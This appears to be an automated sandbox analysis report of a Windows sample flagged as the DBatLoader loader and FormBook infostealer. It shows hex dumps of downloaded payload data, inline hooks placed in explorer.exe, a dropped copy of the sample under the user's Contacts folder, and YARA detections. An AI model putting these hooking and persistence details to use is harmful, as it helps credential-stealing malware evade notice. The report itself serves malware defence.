eb e8 81 05 f3 02 18 e5 86 e4 4f 97 35 5d b6 fb 1b 23 35 5e 24 81 21 50 6d b8 9b 56 08 79 f7 0b 00 68 46 03 ee 77 a3 65 e3 bf fb 72 00
                          Data Ascii: RtF`=i#5X>|T"::LrJwk08a'>l/5)lWbAxyUEzX*P,%0!,'>uBkphNj&#5^8a+G`O($nkE=oSHuO5]#5^$!PmVyhFwer
                          2022-01-13 19:22:56 UTC1319INData Raw: 05 f3 02 6c 57 a8 dc 4e be 0c 82 87 13 12 8f 25 aa e0 58 2a c5 9c c1 93 2d 4b 8e a2 ce 30 d2 39 66 d6 13 13 e1 da 4e 14 94 af 6b d5 bf 8d 07 f7 0b 00 68 4e 14 96 90 f7 0b 01 ea 6e 5b b1 70 60 3e d5 bf 8f 24 b7 7d fc 94 b8 60 6d d8 b5 78 75 eb f0 7b f8 8d 20 ac f2 80 83 0a 7e 7f 01 e8 7d ad 67 cd ae e9 ec 72 64 45 82 93 2d 4b 8e a2 ce 30 d0 3b f5 57 a9 ad 67 c8 23 35 5d b6 fb 13 10 84 8c 9e c5 9c c1 93 2f 5c 62 41 79 f4 84 8c 9e c5 9c c3 9b 3f 73 e6 65 c7 a0 c8 23 aa b1 71 11 0d 00 68 4e 14 94 af 6b d7 c4 1a a1 4c 10 8b 1b 22 5f eb f0 7a 76 6d d9 c8 23 35 5c df d5 bf 8f 24 b7 7d fd fa 0e d6 43 8f 24 b3 74 68 4e 14 94 af 6a b0 ed f4 84 8c 9e c5 9d fd 49 89 16 98 b8 ff 1c a6 d7 c5 22 b3 74 68 4e 14 94 ae 5d 29 13 13 e1 da 4e 14 94 af 6b d5 bf 8e 16 98 b8 ff
                          Data Ascii: lWN%X*-K09fNkhNn[p`>$}`mxu{ ~}grdE-K0;Wg#5]/\bAy?se#qhNkL"_zvm#5\$}C$thNjI"thN])Nk
                          2022-01-13 19:22:56 UTC1335INData Raw: f5 75 8d 45 e4 15 64 26 bc 08 78 71 81 2b 23 47 ed 80 f0 17 6e 5b b1 15 72 11 61 dd bf e6 4a 39 55 d3 dc 21 58 47 a8 e8 5f cd 83 3e c7 ff 2a fd 60 13 26 8a f4 e0 2c e4 0f 60 5d de 30 be 63 ac 91 04 04 03 81 6d f6 fa f4 f0 08 18 f0 18 fe fd 37 17 7f 65 b4 85 61 cc 48 28 fa d2 39 12 fd 7b d7 b0 9f 2b 6a 66 7f 76 40 82 e0 36 b6 96 9b 4b e7 80 ae da 3c c1 a7 6f aa cd d9 af 05 9a d0 1b 40 87 60 13 64 20 ca 54 51 f4 f6 eb df ef ba 05 f3 02 6d d9 c8 23 34 da 4b 8f 24 ba 0a 85 0f 08 79 f4 84 65 c7 a2 ce 30 d3 cf b3 75 eb f3 00 7c 7b f1 fe 9a bd 8a 99 53 57 8d 90 a4 da 4a 0b 00 68 4f 97 55 8a a9 6f ad 01 b5 2c 9b 7c 7a 76 19 6d ba 2b 33 2b 24 9a 89 21 46 2e ba 63 ad 0e ea 41 0c eb 97 1b 10 fd 35 69 e6 12 a2 b9 e6 0b 69 bd a5 36 ad 14 bb f0 1e ce 43 0f 66 3b 09 d4
                          Data Ascii: uEd&xq+#Gn[raJ9U!XG_>*`&,`]0cm7eaH(9{+jfv@6K<o@`d TQm#4K$ye0u|{SWJhOUo,|zvm+3+$!F.cA5ii6Cf;
                          2022-01-13 19:22:56 UTC1351INData Raw: 5e 38 aa af 22 e7 a4 96 e7 b8 b3 35 1e e3 8a d0 66 0a 7d fc 96 b7 4f 8a ef fc 96 fa de 1a f5 45 c5 cf ed b8 be 4f de 07 be 5e 7b a7 15 42 a8 d9 c8 23 37 5b b9 89 17 1a a2 34 c6 40 f0 7b bf da 08 3c a8 83 44 b1 39 32 95 77 bc 57 e4 20 ed bd de 1a f3 41 27 72 30 80 d3 be 0c 82 84 be 04 78 71 c2 15 16 99 9d 5e 4d 97 36 ab 0c f7 64 06 1b 4a 7b ab 65 df d5 bf 8e 67 d1 c2 10 8b 7e 0d 6b bd fa f0 16 fd 4b e5 80 ec 3e f6 98 b8 ff 1d ed e9 9f 4d 92 cf d3 de 21 59 f9 68 20 c7 ce 47 ca 20 a2 ce 30 d3 03 f3 70 65 c7 d4 53 ea 01 a9 30 bd e3 ad 15 63 a0 af 39 61 b6 fb 13 13 aa fd 69 d5 bf fb 7d 89 78 32 bd e9 83 46 04 70 60 3c ef 2f 4d e2 59 ad 08 1f 42 b3 13 67 ae 8c da 4d 92 ab 61 6e 46 6c 52 35 5d f8 c2 5c 67 8f 61 ed ab 2e 8c dd 98 ec 3b 38 a7 06 39 32 84 d3 bd 8a
                          Data Ascii: ^8"5f}OEO^{B#7[4@{<D92wW A'r0xq^M6dJ{eg~kK>M!Yh G 0peS0c9ai}x2Fp`</MYBgManFlR5]\ga.;892
                          2022-01-13 19:22:56 UTC1367INData Raw: 2b c4 18 9d 26 d1 d9 80 b1 20 a6 d7 c4 1a a4 53 99 b8 fd 18 f8 e0 37 29 73 b6 f3 02 6c 52 19 19 9e c7 a4 03 ee 23 6d 9c 95 7c 35 1e f5 0d 04 70 62 56 2e c9 ad 6d d9 e8 69 d0 3d d8 4f 00 6a 52 73 89 7e 0b 61 d3 c9 ca 41 16 d1 d8 29 2b 33 29 27 5d ce 75 e3 c6 1e aa e5 ff 15 80 81 05 80 f1 98 cc 4e 79 95 40 94 ff 6e 3e 93 40 80 cd a6 c7 a0 ca 22 3c e5 76 6f dd a2 bd ef 8b 7f 65 86 fe f5 6f a9 2e a8 bf f7 4e 1c ae e9 ec 73 b9 88 01 e8 69 d0 34 52 14 90 a6 d7 c1 8f 2d d8 44 fe e9 8b 7a 1a e7 89 78 18 e9 9c a4 b0 95 77 e7 e7 e7 e7 e2 40 fc 04 72 64 20 ca 48 44 90 c9 cc 5f ca 42 99 42 bf 87 13 12 8d 2f 59 3c ee ef f9 4b dc 00 2b 02 3e ae a7 16 d1 e2 0c c7 e3 86 d5 e0 5f ba 04 71 87 1b 27 3e f1 fd 18 64 43 7c 7a 77 b0 e8 69 d0 35 09 f3 06 75 99 5b d9 ab 42 9e a0
                          Data Ascii: +& S7)slR#m|5pbV.mi=OjRs~aA)+3)']uNy@n>@"<voeo.Nsi4R-Dzxw@rd HD_BB/Y<K+>_q'>dC|zwi5u[B
                          2022-01-13 19:22:56 UTC1383INData Raw: 5f d5 d7 b7 78 73 e4 61 cc 4a 63 a0 ea 0a 1b 4d f5 6f ae ef f8 8f 24 b7 7f 04 e9 e9 ec 36 96 fb 45 d0 78 72 64 31 35 32 ba 62 45 84 8e a2 ce 31 77 62 44 fe de 01 a5 02 28 c3 97 36 df 0b 8c 9b 3f 37 33 16 cf b1 70 60 3d 57 23 30 d2 7c 2e 94 ed f7 0b 00 68 ba 7b fd 18 d1 f9 40 b7 33 10 dc 4c 10 8f ec 72 64 40 87 15 d0 37 61 ce 59 ff 71 8d 52 5b df ba 6d ad 17 7f 62 39 23 41 0b 61 f2 8a 9d 83 0a 7e 7a 04 76 a8 df d5 cf db 9f 27 6a 3c 83 63 b7 0d 61 dd a9 1b 57 db ac a9 54 26 04 70 60 39 14 92 6f de 53 ef 90 f4 e9 83 78 37 09 98 d6 23 47 c7 d4 4e 75 a7 53 9b 8f 24 b7 78 03 e8 aa e3 de 23 5c 61 d1 e2 34 b8 91 48 75 a9 2a b6 9a f1 f7 0f a1 4c 10 8e d0 32 14 97 36 b3 1b 51 ef 97 59 ee 10 fe f8 e8 2d 41 7c da 4a 0b 05 81 03 2f 53 9f 24 d8 34 af 05 9c 82 f5 69 a4
                          Data Ascii: _xsaJcMo$6Exrd152bE1wbD(6?73p`=W#0|.h{@3Lrd@7aYqR[mb9#Aa~zv'j<caWT&p`9oSx7#GNuS$x#\a4Hu*L26QY-A|J/S$4i
                          2022-01-13 19:22:56 UTC1399INData Raw: 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 07 e7 e7 a7 59 ad 67 cc 2b 47 85 0e 87 13 12 8f 24 b6 b3 74 68 4e 12 8f 24 b5 68 4e 14 94 aa b0 ed f4 84 8c
                          Data Ascii: ~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdYg+G$thN$hN
                          2022-01-13 19:22:56 UTC1415INData Raw: 45 80 83 0a d7 16 ab f2 80 87 d1 eb 15 9d af 36 54 ca 52 96 50 64 ce c3 d2 b3 aa 0b ff e2 ac 20 47 46 fc 69 d1 05 1b 23 75 fb 13 07 7c 3b 92 e6 ee 8b 5e b3 8b e5 14 15 fe 6e 1e 27 3e b0 a5 0c ea 7e f6 ec 2b 1e f0 bb b5 ae 9c 8f 20 6d 5a 68 4f 64 00 ae d1 3f 7b bd 01 e3 ab a2 4b 71 1d 32 ac 0d 54 dd 2f ac 95 da 49 02 3c 13 ec 8e da a2 3a ad ec 8e ff 97 c9 96 f2 b0 91 df 50 57 ee 8f 51 10 8b e8 2c 0f 29 cb cd 9e 3a 8c 9e 84 c4 48 6f 88 55 97 c9 5b 4d 03 06 81 40 7e 80 7c 79 99 d2 39 26 ac e5 f6 03 12 ca ac a4 2b 0a f5 fa d4 b4 0e d2 b0 19 52 94 6b 5e c1 ea 38 af f3 36 54 25 42 21 b4 2c 42 ad 31 07 07 33 da a6 5c 66 8a c4 43 25 d8 ad 98 46 f2 fe 73 25 c5 63 cb 01 02 6c 16 de 97 23 be f0 3e 7c 85 f0 83 3c 04 88 d0 b9 81 44 b9 21 59 bd 03 8a c0 48 5d 76 5e c7
                          Data Ascii: E6TRPd GFi#u|;^n'>~+ mZhOd?{Kq2T/I<:PWQ,):HoU[M@~|y9&+Rk^86T%B!,B13\fC%Fs%cl#>|<D!YH]v^
                          2022-01-13 19:22:56 UTC1431INData Raw: 5b 87 4f 97 76 5b e9 ec 32 e0 14 94 ef e9 e0 58 2a c5 b8 ff 5d be 84 8c 9e c5 9c c1 93 2d 4b 8e a2 ce 30 d2 39 66 49 89 17 1a a1 4c 10 8b 1b 23 35 5d b6 fb 52 15 9e 05 78 05 80 ea 22 e7 e2 5c 72 75 7f 01 ab 73 f2 80 c2 06 45 80 c2 07 a7 59 ec 62 81 05 b3 47 6d d9 88 a6 1b 23 75 dd 85 0e c7 96 d4 3d 2f 66 15 16 d8 70 38 e4 21 07 bb 86 d0 24 bb 86 90 a6 c7 a0 8b 13 26 bc 08 79 f4 84 8c 9e c5 9c c1 93 2d 4b 8e a2 ce 30 d2 39 66 49 89 17 1a a1 4c 10 8b 1b 62 49 ad 67 8c 13 60 53 ed 86 d5 cb da 23 79 93 43 15 64 31 07 b2 e2 5c 73 d2 1d 28 80 b0 05 f3 42 c9 69 d0 74 5e 6c 57 e8 5f da 4a 4b b8 a3 51 db fb 4b 8e e2 6a 1e aa a0 ac c5 9c c1 93 21 31 15 11 c9 a5 55 a4 d3 bb 86 90 a6 d7 c4 1a a1 4c 10 8b 1b 23 35 5d b6 fb 13 12 8f 24 b7 7d fc 96 f5 01 2e 5d c4 75 99
                          Data Ascii: [Ov[2X*]-K09fIL#5]Rx"\rusEYbGm#u=/fp8!$&y-K09fILbIg`S#yCd1\s(Bit^lW_JKQKj!1UL#5]$}.]u
                          2022-01-13 19:22:56 UTC1447INData Raw: 1d 63 c1 7f 44 7d ec 73 f6 dd 5a c7 e5 68 a6 92 22 57 ed f7 fb 56 ad 76 18 9e 3b e9 08 3c 65 00 df da 45 7f e6 e4 07 fb fd d9 3f c4 15 2e 46 65 2b 02 e7 a4 e6 17 c1 16 d3 63 48 f8 72 01 de bb 86 d0 fc 0e b2 2a 19 72 bb 66 0c 0b c0 22 6f 98 31 5c db 4e 10 cb 22 47 c0 9a 51 de da 42 3a 6b 21 74 e3 2e 88 1c 5e 7d ff 1c 2d bf ca ac 9e 2e 39 23 bc f0 3e f2 80 83 0a de d3 30 d2 39 66 dc c9 aa e0 58 2a c5 38 5c b0 15 43 f5 0e d2 b2 fe df 5e 6f 8b 48 db 09 78 9d c8 76 ad ec 72 20 3d 27 1b dc 8c 9f 48 43 fb 8f 09 78 b1 fb d0 69 28 2b b8 00 19 45 69 13 12 cf 75 2f 38 f4 0d 60 65 9e 9f 88 a6 d7 80 04 ec 77 10 ab eb 94 9f b7 19 1f 6c 90 1b 4b db 0d 37 8d ab 37 a1 c7 63 98 e6 a6 d4 c2 ea 08 9e 2d 88 be ca ac 26 e7 b9 47 86 6f 22 d5 4a e3 18 b6 38 6f d3 c6 ed cf 6a d9
                          Data Ascii: cD}sZh"WVv;<eE?.Fe+cHr*rf"o1\N"GQB:k!t.^}-.9#>09fX*8\C^oHxvr ='HCxi(+Eiu/8`ewlK77c-&Go"J8oj
                          2022-01-13 19:22:56 UTC1455INData Raw: 96 40 b0 66 4f 68 b1 8c 2e 48 c1 6c a8 20 02 e9 65 38 1b dd 3e 74 e5 e7 18 62 bd 22 36 19 e0 a7 a5 f1 78 f8 72 9b c4 be 89 9a 42 05 78 12 67 cf 39 99 c5 67 68 db 40 0a 81 bf f3 ea 3e 0e 78 d9 22 5b b1 34 5d d6 e3 8e a6 97 bd 8a dd a0 76 cc 7b 07 08 85 e4 e4 ec 72 64 44 fe f2 78 34 52 1d 68 e6 a9 e6 6d ad 49 76 6f a1 cc d7 91 a2 dc 3b aa 65 38 1b f0 64 ad 9b 7a fd e4 24 3e 0e 78 ed 7e 97 32 95 b9 a8 a8 1c 22 4c ef 74 8a 71 e2 1c c0 31 41 f3 c1 18 65 82 0e 87 53 37 a9 e6 99 7f 88 95 72 cc e3 66 b6 04 a3 2a 2d 4b 8e a3 55 1d d7 3b 94 40 70 ed b6 2b cc 2b 47 8b 51 73 ba b6 04 8f d9 22 36 52 e9 99 b3 8b e4 9d 93 98 93 24 5c c7 e5 6a ad 98 47 08 91 ef 72 9b c0 a8 3c 04 20 ae ad e1 ba a5 05 0c 7d 01 00 ed 79 f4 84 8d 25 52 3e 84 4c 95 cd 51 22 48 ef a9 a1 b3 88
                          Data Ascii: @fOh.Hl e8>tb"6xrBxg9gh@>x"[4]v{rdDx4RhmIvo;e8dz$>x~2"Ltq1AeS7rf*-KU;@p++GQs"6R$\jGr< }y%R>LQ"H
                          2022-01-13 19:22:56 UTC1471INData Raw: 0c ea f2 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 7c 12 13 82 e9 83 63 b7 0d 61 dd a9 1b 4f f6 e6 17 7f 75 93 68 0b 12 8f 64 71 c6 1e ea 5d 5e 38 a4 e0 94 af 2b 71 b6 fb 53 a9 3e f1 bd bc 54 22 f3 34 83 0a 3e c7 ec 72 24 d0 ac e5 e3 de 43 7c 3a 80 bf 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 ba 6c 6b 15 9d 2f 31 3a 9a d8 32 ae ac a0 c3 97 76 59 89 17 5a 1c 4e 14 d4 0e 4b 8e e2 6a 06 75 ab 54 42 fa d1 80 df d5 ff 2a 9d 43 3c da 06 75 ab 04 50 19 1f 2c d9 c8 63 a4 37 61 be 0c 82 87 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa d1 d1 52 6f b2 80 f1 b8 8b 6e 14 fa d8 03 e5 e3 9e f1 d9 c8 63 f0 93 2d 0b 33 95 32 96 82 d3 bb c6 28 a0 ca 67 fa cd
                          Data Ascii: ~n[p`<rdE~n[p`|caOuhdq]^8+qS>T"4>r$C|:$}2B)B)B)B)Blk/1:2vYZNKjuTB*C<uP,c7a$}2B)B)BRonc-32(g
                          2022-01-13 19:22:56 UTC1487INData Raw: 80 87 37 25 b1 74 4c 54 ab a1 4f b3 70 eb 2d 48 48 ec 8d df 22 8c 76 b8 74 ab 61 9a b9 0a 70 1c aa 1d ab 8d 0b ff e3 2a bb 6e 53 bb c2 9e f7 e0 a5 7e 7b dc 0b 89 d2 3a e2 22 4e 2f 58 40 7e 77 cb fd 93 25 1e ee fe 9e e1 9e 4e 5b c4 18 9d b5 7c 5e 7c f1 f9 2b 03 67 0a 7d d8 42 71 1d d7 3c 6e b3 74 68 4e aa 09 fa 21 29 cb 8d 24 3c 34 d0 b4 f6 88 96 91 29 c9 81 01 61 be 48 82 37 64 44 38 cf 71 69 d0 70 e6 71 41 b8 cc 2b 03 68 5a 32 d5 bf cb 2f 48 02 6d d9 8c 18 89 b6 e3 a3 5d b6 bf 09 ef c4 99 3a ac 63 db f0 7a 76 29 c4 0e ba 2d 04 0f 09 bf 09 ef c4 21 54 57 a8 98 3e e9 e9 d7 c0 35 19 94 51 b0 16 13 12 8f 25 32 3f ad ec 72 64 44 f1 14 6b 2a 33 1b cb ad a7 da 4e 30 96 3f 5b 38 e0 7c 3e 7a 74 a5 d6 46 27 7a ff df d6 66 4d 19 3c 90 aa 1d ab 9d bc fd 49 61 b6 df
                          Data Ascii: 7%tLTOp-HH"vtap*nS~{:"N/X@~w%N[|^|+g}Bq<nthN!)$<4)aH7dD8qipqA+hZ2/Hm]:czv)-!TW>5Q%2?rdDk*3N0?[8|>ztF'zfM<Ia


                          Code Manipulations

                          User Modules

                          Hook Summary

                          Function NameHook TypeActive in Processes
                          PeekMessageAINLINEexplorer.exe
                          PeekMessageWINLINEexplorer.exe
                          GetMessageWINLINEexplorer.exe
                          GetMessageAINLINEexplorer.exe

                          Processes

                          Process: explorer.exe, Module: user32.dll
                          Function NameHook TypeNew Data
                          PeekMessageAINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE3
                          PeekMessageWINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE3
                          GetMessageWINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE3
                          GetMessageAINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE3

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: WZ454554.exe PID: 6628 Parent PID: 5028

                          General

                          Start time:20:22:15
                          Start date:13/01/2022
                          Path:C:\Users\user\Desktop\WZ454554.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\WZ454554.exe"
                          Imagebase:0x400000
                          File size:807424 bytes
                          MD5 hash:58B39C2620CDDA3D3FA6A125F476FC9F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Yara matches:
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000002.00000000.283008845.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          Reputation:low

                          Chronological Activities

                          Analysis Process: WZ454554.exe PID: 6936 Parent PID: 6628

                          General

                          Start time:20:22:34
                          Start date:13/01/2022
                          Path:C:\Users\user\Desktop\WZ454554.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\WZ454554.exe
                          Imagebase:0x400000
                          File size:807424 bytes
                          MD5 hash:58B39C2620CDDA3D3FA6A125F476FC9F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000000.323155523.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000000.321956986.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000000.322739212.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000000.322356028.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Chronological Activities

                          Analysis Process: explorer.exe PID: 3352 Parent PID: 6936

                          General

                          Start time:20:22:36
                          Start date:13/01/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff720ea0000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Chronological Activities

                          Analysis Process: Hyrzbcwcas.exe PID: 1840 Parent PID: 3352

                          General

                          Start time:20:22:43
                          Start date:13/01/2022
                          Path:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Contacts\Hyrzbcwcas.exe"
                          Imagebase:0x400000
                          File size:807424 bytes
                          MD5 hash:58B39C2620CDDA3D3FA6A125F476FC9F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:Borland Delphi
                          Yara matches:
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000000.342065760.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\Contacts\Hyrzbcwcas.exe, Author: Joe Security
                          Antivirus matches:
                          • Detection: 39%, ReversingLabs
                          Reputation:low

                          Chronological Activities

                          Analysis Process: Hyrzbcwcas.exe PID: 7108 Parent PID: 3352

                          General

                          Start time:20:22:52
                          Start date:13/01/2022
                          Path:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Contacts\Hyrzbcwcas.exe"
                          Imagebase:0x400000
                          File size:807424 bytes
                          MD5 hash:58B39C2620CDDA3D3FA6A125F476FC9F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:Borland Delphi
                          Yara matches:
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000000.360667337.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000000.363228459.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000000.362225116.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000000.361296807.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          Reputation:low

                          Chronological Activities

                          Analysis Process: Hyrzbcwcas.exe PID: 5708 Parent PID: 1840

                          General

                          Start time:20:23:08
                          Start date:13/01/2022
                          Path:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          Imagebase:0x400000
                          File size:807424 bytes
                          MD5 hash:58B39C2620CDDA3D3FA6A125F476FC9F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000011.00000000.395638954.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000011.00000000.398461439.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000011.00000000.397793786.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
